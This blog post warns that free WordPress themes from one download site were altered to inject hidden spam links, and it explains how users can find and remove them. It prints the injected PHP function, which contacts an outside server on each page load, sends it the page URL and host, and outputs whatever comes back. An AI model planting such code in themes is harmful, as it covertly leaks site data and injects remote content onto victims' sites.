Zen Zoomie’s Place: Chronicles of a (Wannabe) Pro Blogger

On Wednesday, I talked about a sneaky trick that some black hat search engine marketers are resorting to. If you didn’t read that article, you should. But in the meantime, I’ll catch you up. The bottom line is, if you downloaded a free WordPress theme, there’s a chance you’re providing free advertising for a web marketer without your knowledge or permission. (Thanks to Robert Kingston at Bracing Your Brand for breaking this story!)

WTF?

The scoop: Some individuals are modifying free WordPress themes to insert invisible links to websites that they are marketing. The links can be to all sorts of sites including casinos, hotels, or who knows… The point is–they’re creating links to those sites from your blog without your permission or knowledge. And they’re hiding the links–against the Google Webmaster Guidelines–which means your blog’s Google rankings may be punished for something you had no knowledge of.

The Main Culprit - Templatesbrowser.com

To cut straight to the chase, if you downloaded a free WordPress theme from the "www.templatesbrowser.com/wordpress-themes" website, you’ve joined their advertising team whether you wanted to or not. They have a pretty neat setup–you can preview any of the 100+ WordPress themes to see what it looks like. They provide a nice interface and a convenient service. But there’s a catch!

The theme files that they have available for download aren’t the original theme files. Templatesbrowser has modified each of the ‘free’ WordPress themes on their website to automatically insert those sneaky hidden links. They do it by calling a function called credits–normally from the footer.php file. Here’s the code they’re using:

<?php

function credits()
{
$url = "http://1.templatesbrowser.com/wp.php?" .
"url=" . urlencode($_SERVER[’REQUEST_URI’]) . "&" . "host=" . urlencode($_SERVER[’HTTP_HOST’]);
$check = @fsockopen("1.templatesbrowser.com", 80, $errno, $errstr, 3);
if($check)
{
@readfile($url);
fclose($check);
}
}

?>

How do You Know if You Have a Modified WordPress Theme?

There are a few different ways to check. The easiest way to know for sure is:

1. Go to your WordPress Control Panel
2. Click on the Presentation Tab
3. Click on the Theme Editor Sub-tab
4. Check to see if you have a file called functions.php. If you do, click on it.
5. Check to see if it has the code above that references templatesbrowser.com.
   

You may also want to check your footer.php file to see if there’s a call to credits. Or as a third option, try using the free FireFox developer’s add-on that Robert suggested. The above steps will only catch templatesbrowser.com modified themes. Robert’s technique will help you find a much wider variety of mischief. If you find the above code in your theme files, congratulations. You’ve joined the templatesbrowser.com advertising team!

What do You Do If You’re "Infected"?

If you have a templatesbrowser.com modified theme, and you’re not keen on being on their advertising team without being paid, the best thing to do is find a trusted source to download the original theme files from (the author, or Wordpress.org’s theme directory are probably good bets). Just delete the corrupted theme from your WordPress installation, upload the clean files, and you’re back in business minus the pro bono advertisements.